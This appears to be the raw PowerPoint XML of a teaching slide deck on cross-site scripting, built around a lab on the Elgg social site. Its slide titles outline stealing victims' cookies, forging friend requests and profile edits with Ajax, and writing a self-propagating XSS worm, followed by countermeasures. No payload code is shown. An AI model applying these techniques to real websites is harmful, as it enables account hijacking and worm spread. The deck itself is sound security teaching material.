            <a:ext cx="9015682" cy="2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2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78" y="191025"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Task 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Becoming the Victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Friend</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> “About Me” field (text  mode)&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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04334"/>
            <a:ext cx="8520600" cy="3764542"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “About Me” field (text  mode)&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2018-10-28 at 4.41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5685"/>
            <a:ext cx="9144000" cy="3027815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2018-10-28 at 4.41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28"/>
            <a:ext cx="9144000" cy="11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31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858</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>107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Simple Light</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Attack (XSS)</vt:lpstr>
      <vt:lpstr>Environment Setup  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Task 1: Posting a Malicious Message to Display an Alert Window  </vt:lpstr>
      <vt:lpstr>Steps: Samy injects to Alice’s account</vt:lpstr>
      <vt:lpstr>Task 2: Posting a Malicious Message to Display Cookies    </vt:lpstr>
      <vt:lpstr>Task 3: Stealing Cookies from the Victim’s Machine   </vt:lpstr>
      <vt:lpstr>Task 4: Becoming the Victim’s Friend</vt:lpstr>
      <vt:lpstr>Task 4: Becoming the Victim’s Friend &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to Samy’s “About Me” field (text  mode)&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</vt:lpstr>
      <vt:lpstr>Task 4: Becoming the Victim’s Friend</vt:lpstr>
      <vt:lpstr>HTTP Request for Adding Friends(Elgg)</vt:lpstr>
      <vt:lpstr>Construct the URL</vt:lpstr>
      <vt:lpstr>Write the Ajax code</vt:lpstr>
      <vt:lpstr>Let’s Do the Attack</vt:lpstr>
      <vt:lpstr>Task 5: Modifying the Victim’s Profile </vt:lpstr>
      <vt:lpstr>Task 5: Modifying the Victim’s Profile &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to Samy’s “About Me” field (text  mode)&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; </vt:lpstr>
      <vt:lpstr>Task 5: Modifying the Victim’s Profile</vt:lpstr>
      <vt:lpstr>Task 5: Modifying the Victim’s Profile</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Construct the URL and Payload</vt:lpstr>
      <vt:lpstr>Send out the POST Request using Ajax</vt:lpstr>
      <vt:lpstr>Let’s Do the Attack</vt:lpstr>
      <vt:lpstr>Task 6: Writing a Self-Propagating XSS Worm </vt:lpstr>
      <vt:lpstr>Self-Propagation XSS Worm</vt:lpstr>
      <vt:lpstr>Get a Copy of Self</vt:lpstr>
      <vt:lpstr>Write a Self-Propagating XSS Worm</vt:lpstr>
      <vt:lpstr>Let’s Do the Attack</vt:lpstr>
      <vt:lpstr>Task 7: Countermeasures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Scripting Attack (XSS)</dc:title>
  <cp:lastModifiedBy>Vivian</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-25T17:21:26Z</dcterms:modified>
</cp:coreProperties>
</file>